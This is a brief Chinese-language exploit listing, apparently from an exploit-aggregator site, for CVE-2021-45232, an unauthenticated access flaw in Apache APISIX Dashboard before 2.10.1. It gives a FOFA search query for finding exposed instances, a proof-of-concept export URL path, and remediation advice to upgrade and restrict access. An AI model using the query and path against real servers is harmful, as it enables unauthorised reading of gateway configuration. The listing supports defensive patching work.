Share
## https://sploitus.com/exploit?id=F0B022B7-C762-5965-B562-AD7B3EEACCE4
# Apache APISIX Dashboard未授权访问漏洞(CVE-2021-45232)
## FOFA 查询
title="Apache APISIX Dashboard"
## 影响范围
Apache APISIX Dashboard < 2.10.1
## POC:
```IP:PORT/apisix/admin/migrate/export
IP:PORT/apisix/admin/migrate/export
```
![image](https://github.com/pingpongcult/CVE-2021-4523/blob/main/CVE-2021-45232.png)
## 修复建议
- 升级至最新安全版本 Apache APISIX Dashboard 2.10.1:https://github.com/apache/apisix-dashboard/releases/tag/v2.10.1
- 修改默认用户名和密码,并配置访问 Apache APISIX Dashboard的白名单。
## 参考链接
https://apisix.apache.org/zh/blog/2021/12/28/dashboard-cve-2021-45232/